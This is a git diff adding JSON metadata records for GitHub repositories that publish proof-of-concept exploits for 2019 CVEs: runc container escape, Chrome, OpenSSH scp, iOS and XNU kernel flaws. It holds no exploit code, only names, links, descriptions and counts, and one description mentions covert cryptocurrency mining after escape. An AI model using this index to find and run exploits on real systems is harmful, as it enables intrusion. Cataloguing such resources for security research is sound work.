1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 171668415, + "name": "RunC-CVE-2019-5736", + "full_name": "twistlock\/RunC-CVE-2019-5736", + "owner": { + "login": "twistlock", + "id": 12218272, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12218272?v=4", + "html_url": "https:\/\/github.com\/twistlock", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twistlock\/RunC-CVE-2019-5736", + "description": "CVE-2019-5736 POCs", + "fork": false, + "created_at": "2019-02-20T12:23:13Z", + "updated_at": "2024-10-11T13:48:14Z", + "pushed_at": "2020-06-22T13:04:55Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 83, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 173057459, + "name": "CVE-2019-5736-PoC-2", + "full_name": "yyqs2008\/CVE-2019-5736-PoC-2", + "owner": { + "login": "yyqs2008", + "id": 1332668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1332668?v=4", + "html_url": "https:\/\/github.com\/yyqs2008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yyqs2008\/CVE-2019-5736-PoC-2", + "description": null, + "fork": false, + "created_at": "2019-02-28T06:48:13Z", + "updated_at": "2020-06-11T14:27:08Z", + "pushed_at": "2019-02-23T13:20:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 177891884, + "name": "CVE-2019-5736", + "full_name": "stillan00b\/CVE-2019-5736", + "owner": { + "login": "stillan00b", + "id": 48630837, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48630837?v=4", + "html_url": "https:\/\/github.com\/stillan00b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stillan00b\/CVE-2019-5736", + "description": null, + "fork": false, + "created_at": "2019-03-27T00:52:49Z", + "updated_at": "2019-03-27T01:05:08Z", + "pushed_at": "2019-03-27T01:05:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 181238407, + "name": "cve-2019-5736-exp", + "full_name": "milloni\/cve-2019-5736-exp", + "owner": { + "login": "milloni", + "id": 2845035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2845035?v=4", + "html_url": "https:\/\/github.com\/milloni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/milloni\/cve-2019-5736-exp", + "description": "Exploit for the CVE-2019-5736 runc vulnerability", + "fork": false, + "created_at": "2019-04-13T23:18:54Z", + "updated_at": "2021-11-25T16:56:10Z", + "pushed_at": "2019-04-14T21:39:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 185733954, + "name": "Docker-Runc-Exploit", + "full_name": "panzouh\/Docker-Runc-Exploit", + "owner": { + "login": "panzouh", + "id": 26403285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26403285?v=4", + "html_url": "https:\/\/github.com\/panzouh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/panzouh\/Docker-Runc-Exploit", + "description": "Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https:\/\/github.com\/Frichetten\/CVE-2019-5736-PoC.git", + "fork": false, + "created_at": "2019-05-09T05:45:21Z", + "updated_at": "2021-12-08T15:16:26Z", + "pushed_at": "2021-12-08T15:16:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5736", + "docker", + "dockerfile", + "runc" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 194520468, + "name": "CVE-2019-5736-POC", + "full_name": "RyanNgWH\/CVE-2019-5736-POC", + "owner": { + "login": "RyanNgWH", + "id": 44436551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44436551?v=4", + "html_url": "https:\/\/github.com\/RyanNgWH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RyanNgWH\/CVE-2019-5736-POC", + "description": "Proof of concept code for breaking out of docker via runC", + "fork": false, + "created_at": "2019-06-30T13:42:14Z", + "updated_at": "2019-06-30T16:33:39Z", + "pushed_at": "2019-06-30T16:33:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 200632359, + "name": "cve-2019-5736-study", + "full_name": "Lee-SungYoung\/cve-2019-5736-study", + "owner": { + "login": "Lee-SungYoung", + "id": 34130740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34130740?v=4", + "html_url": "https:\/\/github.com\/Lee-SungYoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lee-SungYoung\/cve-2019-5736-study", + "description": null, + "fork": false, + "created_at": "2019-08-05T10:15:52Z", + "updated_at": "2019-08-05T10:16:32Z", + "pushed_at": "2019-08-05T10:16:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 214599324, + "name": "cve-2019-5736-poc", + "full_name": "chosam2\/cve-2019-5736-poc", + "owner": { + "login": "chosam2", + "id": 40632767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40632767?v=4", + "html_url": "https:\/\/github.com\/chosam2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chosam2\/cve-2019-5736-poc", + "description": null, + "fork": false, + "created_at": "2019-10-12T07:22:57Z", + "updated_at": "2019-11-16T09:01:20Z", + "pushed_at": "2019-11-16T09:01:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 227655174, + "name": "Docker-Escape-Miner", + "full_name": "epsteina16\/Docker-Escape-Miner", + "owner": { + "login": "epsteina16", + "id": 14108788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14108788?v=4", + "html_url": "https:\/\/github.com\/epsteina16", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/epsteina16\/Docker-Escape-Miner", + "description": "Code sample for using exploit CVE-2019-5736 to mine bitcoin with no association to original container or user.", + "fork": false, + "created_at": "2019-12-12T16:57:13Z", + "updated_at": "2022-01-04T13:01:30Z", + "pushed_at": "2019-12-12T16:58:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 232528693, + "name": "CVE-2019-5736", + "full_name": "geropl\/CVE-2019-5736", + "owner": { + "login": "geropl", + "id": 32448529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32448529?v=4", + "html_url": "https:\/\/github.com\/geropl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geropl\/CVE-2019-5736", + "description": null, + "fork": false, + "created_at": "2020-01-08T09:37:54Z", + "updated_at": "2021-10-21T21:43:59Z", + "pushed_at": "2020-01-08T10:28:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 238321546, + "name": "CVE-2019-5736-Custom-Runtime", + "full_name": "GiverOfGifts\/CVE-2019-5736-Custom-Runtime", + "owner": { + "login": "GiverOfGifts", + "id": 37567588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37567588?v=4", + "html_url": "https:\/\/github.com\/GiverOfGifts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GiverOfGifts\/CVE-2019-5736-Custom-Runtime", + "description": "CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.", + "fork": false, + "created_at": "2020-02-04T22:38:14Z", + "updated_at": "2020-04-14T22:24:42Z", + "pushed_at": "2020-02-20T21:44:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 260558634, + "name": "CVE-2019-5736-PoC", + "full_name": "Billith\/CVE-2019-5736-PoC", + "owner": { + "login": "Billith", + "id": 23652438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23652438?v=4", + "html_url": "https:\/\/github.com\/Billith", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Billith\/CVE-2019-5736-PoC", + "description": null, + "fork": false, + "created_at": "2020-05-01T21:07:42Z", + "updated_at": "2020-05-03T14:03:46Z", + "pushed_at": "2020-05-03T14:03:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 262714185, + "name": "POC-CVE-2019-5736", + "full_name": "BBRathnayaka\/POC-CVE-2019-5736", + "owner": { + "login": "BBRathnayaka", + "id": 36528636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36528636?v=4", + "html_url": "https:\/\/github.com\/BBRathnayaka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBRathnayaka\/POC-CVE-2019-5736", + "description": null, + "fork": false, + "created_at": "2020-05-10T04:49:28Z", + "updated_at": "2020-05-14T04:06:14Z", + "pushed_at": "2020-05-14T04:06:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263365629, + "name": "IT19172088", + "full_name": "shen54\/IT19172088", + "owner": { + "login": "shen54", + "id": 53970524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53970524?v=4", + "html_url": "https:\/\/github.com\/shen54", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shen54\/IT19172088", + "description": "CVE-2019-5736", + "fork": false, + "created_at": "2020-05-12T14:47:27Z", + "updated_at": "2021-08-08T14:17:43Z", + "pushed_at": "2021-08-08T14:17:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 384265226, + "name": "CVE-2019-5736", + "full_name": "n3rdh4x0r\/CVE-2019-5736", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2019-5736", + "description": null, + "fork": false, + "created_at": "2021-07-08T22:46:30Z", + "updated_at": "2024-11-18T19:16:29Z", + "pushed_at": "2024-11-18T19:16:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 393789801, + "name": "Docker-breakout-runc", + "full_name": "fahmifj\/Docker-breakout-runc", + "owner": { + "login": "fahmifj", + "id": 65661058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65661058?v=4", + "html_url": "https:\/\/github.com\/fahmifj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fahmifj\/Docker-breakout-runc", + "description": "Modified version of CVE-2019-5736-PoC by Frichetten", + "fork": false, + "created_at": "2021-08-07T20:51:07Z", + "updated_at": "2021-10-24T23:09:09Z", + "pushed_at": "2021-08-07T20:52:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5736" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442786913, + "name": "CVE-2019-5736_POC", + "full_name": "Asbatel\/CVE-2019-5736_POC", + "owner": { + "login": "Asbatel", + "id": 34680708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34680708?v=4", + "html_url": "https:\/\/github.com\/Asbatel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Asbatel\/CVE-2019-5736_POC", + "description": null, + "fork": false, + "created_at": "2021-12-29T13:48:42Z", + "updated_at": "2021-12-29T13:51:05Z", + "pushed_at": "2021-12-29T13:51:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465350451, + "name": "cve-2019-5736-reproducer", + "full_name": "takumak\/cve-2019-5736-reproducer", + "owner": { + "login": "takumak", + "id": 11924923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11924923?v=4", + "html_url": "https:\/\/github.com\/takumak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/takumak\/cve-2019-5736-reproducer", + "description": null, + "fork": false, + "created_at": "2022-03-02T14:57:08Z", + "updated_at": "2022-03-02T15:06:58Z", + "pushed_at": "2022-03-02T16:17:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470511443, + "name": "CVE-2019-5736", + "full_name": "si1ent-le\/CVE-2019-5736", + "owner": { + "login": "si1ent-le", + "id": 56815669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56815669?v=4", + "html_url": "https:\/\/github.com\/si1ent-le", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/si1ent-le\/CVE-2019-5736", + "description": null, + "fork": false, + "created_at": "2022-03-16T09:22:20Z", + "updated_at": "2022-03-16T09:49:49Z", + "pushed_at": "2022-03-16T09:56:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 895315819, + "name": "CVE-2019-5736-attack-and-security-mechanism", + "full_name": "sonyavalo\/CVE-2019-5736-attack-and-security-mechanism", + "owner": { + "login": "sonyavalo", + "id": 91805641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91805641?v=4", + "html_url": "https:\/\/github.com\/sonyavalo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sonyavalo\/CVE-2019-5736-attack-and-security-mechanism", + "description": "Description of the Project goes here", + "fork": false, + "created_at": "2024-11-28T01:19:42Z", + "updated_at": "2024-11-28T03:20:29Z", + "pushed_at": "2024-11-28T03:20:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "docker", + "security-mechanism", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5737.json b/2019/CVE-2019-5737.json new file mode 100644 index 0000000000..6afd77183c --- /dev/null +++ b/2019/CVE-2019-5737.json @@ -0,0 +1,33 @@ +[ + { + "id": 172282648, + "name": "cve-2019-5737", + "full_name": "beelzebruh\/cve-2019-5737", + "owner": { + "login": "beelzebruh", + "id": 39379168, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39379168?v=4", + "html_url": "https:\/\/github.com\/beelzebruh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/beelzebruh\/cve-2019-5737", + "description": null, + "fork": false, + "created_at": "2019-02-24T01:20:04Z", + "updated_at": "2021-02-11T02:58:53Z", + "pushed_at": "2019-02-24T03:43:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5782.json b/2019/CVE-2019-5782.json new file mode 100644 index 0000000000..05dc541492 --- /dev/null +++ b/2019/CVE-2019-5782.json @@ -0,0 +1,33 @@ +[ + { + "id": 322713406, + "name": "CVE-2019-5782_CVE-2019-13768", + "full_name": "ZwCreatePhoton\/CVE-2019-5782_CVE-2019-13768", + "owner": { + "login": "ZwCreatePhoton", + "id": 73783540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73783540?v=4", + "html_url": "https:\/\/github.com\/ZwCreatePhoton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZwCreatePhoton\/CVE-2019-5782_CVE-2019-13768", + "description": "Full chain Chrome 71.0.3578.98 exploit", + "fork": false, + "created_at": "2020-12-18T21:57:26Z", + "updated_at": "2024-04-11T16:19:18Z", + "pushed_at": "2021-07-18T07:08:33Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5784.json b/2019/CVE-2019-5784.json new file mode 100644 index 0000000000..597b7459c2 --- /dev/null +++ b/2019/CVE-2019-5784.json @@ -0,0 +1,33 @@ +[ + { + "id": 831753735, + "name": "CVE-2019-5784-PoC", + "full_name": "rooootdev\/CVE-2019-5784-PoC", + "owner": { + "login": "rooootdev", + "id": 103732419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103732419?v=4", + "html_url": "https:\/\/github.com\/rooootdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rooootdev\/CVE-2019-5784-PoC", + "description": "a proof of concept for CVE-2019-5784", + "fork": false, + "created_at": "2024-07-21T14:30:28Z", + "updated_at": "2024-07-21T14:36:03Z", + "pushed_at": "2024-07-21T14:36:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5786.json b/2019/CVE-2019-5786.json new file mode 100644 index 0000000000..3215a5eef9 --- /dev/null +++ b/2019/CVE-2019-5786.json @@ -0,0 +1,33 @@ +[ + { + "id": 176796740, + "name": "CVE-2019-5786", + "full_name": "exodusintel\/CVE-2019-5786", + "owner": { + "login": "exodusintel", + "id": 16653014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16653014?v=4", + "html_url": "https:\/\/github.com\/exodusintel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exodusintel\/CVE-2019-5786", + "description": "FileReader Exploit", + "fork": false, + "created_at": "2019-03-20T18:43:49Z", + "updated_at": "2024-11-22T06:44:14Z", + "pushed_at": "2019-03-20T18:47:25Z", + "stargazers_count": 256, + "watchers_count": 256, + "has_discussions": false, + "forks_count": 81, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 81, + "watchers": 256, + "score": 0, + "subscribers_count": 15 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5822.json b/2019/CVE-2019-5822.json new file mode 100644 index 0000000000..35857eac68 --- /dev/null +++ b/2019/CVE-2019-5822.json @@ -0,0 +1,33 @@ +[ + { + "id": 261706116, + "name": "14-828_Exploitation_of_CVE-2019-5822", + "full_name": "Silence-Rain\/14-828_Exploitation_of_CVE-2019-5822", + "owner": { + "login": "Silence-Rain", + "id": 22982333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22982333?v=4", + "html_url": "https:\/\/github.com\/Silence-Rain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Silence-Rain\/14-828_Exploitation_of_CVE-2019-5822", + "description": null, + "fork": false, + "created_at": "2020-05-06T09:05:23Z", + "updated_at": "2021-08-05T07:18:45Z", + "pushed_at": "2022-12-12T16:59:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5825.json b/2019/CVE-2019-5825.json new file mode 100644 index 0000000000..d252f063ae --- /dev/null +++ b/2019/CVE-2019-5825.json @@ -0,0 +1,33 @@ +[ + { + "id": 223578530, + "name": "CVE-2019-5825", + "full_name": "timwr\/CVE-2019-5825", + "owner": { + "login": "timwr", + "id": 684924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684924?v=4", + "html_url": "https:\/\/github.com\/timwr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timwr\/CVE-2019-5825", + "description": null, + "fork": false, + "created_at": "2019-11-23T11:35:34Z", + "updated_at": "2022-10-05T05:25:44Z", + "pushed_at": "2019-11-25T06:09:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5893.json b/2019/CVE-2019-5893.json new file mode 100644 index 0000000000..c12d543409 --- /dev/null +++ b/2019/CVE-2019-5893.json @@ -0,0 +1,37 @@ +[ + { + "id": 165075365, + "name": "OpenSource-ERP-SQL-Injection", + "full_name": "EmreOvunc\/OpenSource-ERP-SQL-Injection", + "owner": { + "login": "EmreOvunc", + "id": 15659223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15659223?v=4", + "html_url": "https:\/\/github.com\/EmreOvunc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EmreOvunc\/OpenSource-ERP-SQL-Injection", + "description": "CVE-2019-5893 | OpenSource ERP application has SQL Injection vulnerability.", + "fork": false, + "created_at": "2019-01-10T14:36:55Z", + "updated_at": "2024-08-12T19:44:45Z", + "pushed_at": "2019-01-11T07:45:37Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5893", + "erp", + "sql-injection" + ], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6111.json b/2019/CVE-2019-6111.json new file mode 100644 index 0000000000..b2985578b8 --- /dev/null +++ b/2019/CVE-2019-6111.json @@ -0,0 +1,70 @@ +[ + { + "id": 263409584, + "name": "SNP", + "full_name": "53n7hu\/SNP", + "owner": { + "login": "53n7hu", + "id": 61116952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61116952?v=4", + "html_url": "https:\/\/github.com\/53n7hu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/53n7hu\/SNP", + "description": "CVE-2019-6111 vulnerability exploitation", + "fork": false, + "created_at": "2020-05-12T17:48:26Z", + "updated_at": "2022-08-11T23:59:04Z", + "pushed_at": "2020-05-12T17:54:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 822633624, + "name": "MAL-008", + "full_name": "mbadanoiu\/MAL-008", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/MAL-008", + "description": "Case Study: SSHtranger Things (CVE-2019-6111, CVE-2019-6110) in Cisco SD-WAN", + "fork": false, + "created_at": "2024-07-01T14:07:20Z", + "updated_at": "2024-07-01T15:08:03Z", + "pushed_at": "2024-07-01T14:27:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-6110", + "cve-2019-6111", + "remote-code-execution", + "unauthenticated", + "user-interaction" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6203.json b/2019/CVE-2019-6203.json new file mode 100644 index 0000000000..ff1eee37c3 --- /dev/null +++ b/2019/CVE-2019-6203.json @@ -0,0 +1,33 @@ +[ + { + "id": 185970201, + "name": "CVE-2019-6203-PoC", + "full_name": "qingxp9\/CVE-2019-6203-PoC", + "owner": { + "login": "qingxp9", + "id": 2822242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2822242?v=4", + "html_url": "https:\/\/github.com\/qingxp9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qingxp9\/CVE-2019-6203-PoC", + "description": "PoC for CVE-2019-6203, works on < iOS 12.2, macOS < 10.14.4", + "fork": false, + "created_at": "2019-05-10T10:36:54Z", + "updated_at": "2024-08-12T19:48:44Z", + "pushed_at": "2019-05-17T03:10:30Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6207.json b/2019/CVE-2019-6207.json new file mode 100644 index 0000000000..dec8fe5f89 --- /dev/null +++ b/2019/CVE-2019-6207.json @@ -0,0 +1,97 @@ +[ + { + "id": 187157796, + "name": "CVE-2019-6207", + "full_name": "dothanthitiendiettiende\/CVE-2019-6207", + "owner": { + "login": "dothanthitiendiettiende", + "id": 29480786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29480786?v=4", + "html_url": "https:\/\/github.com\/dothanthitiendiettiende", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dothanthitiendiettiende\/CVE-2019-6207", + "description": "getdirentriesattr kernel heap inofo leak", + "fork": false, + "created_at": "2019-05-17T06:17:51Z", + "updated_at": "2019-05-17T06:29:13Z", + "pushed_at": "2019-05-17T06:17:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 187160556, + "name": "CVE-2019-6207", + "full_name": "maldiohead\/CVE-2019-6207", + "owner": { + "login": "maldiohead", + "id": 23315692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23315692?v=4", + "html_url": "https:\/\/github.com\/maldiohead", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maldiohead\/CVE-2019-6207", + "description": "xnu kernel heap info leak", + "fork": false, + "created_at": "2019-05-17T06:37:07Z", + "updated_at": "2024-05-03T21:24:00Z", + "pushed_at": "2019-11-21T05:57:38Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + 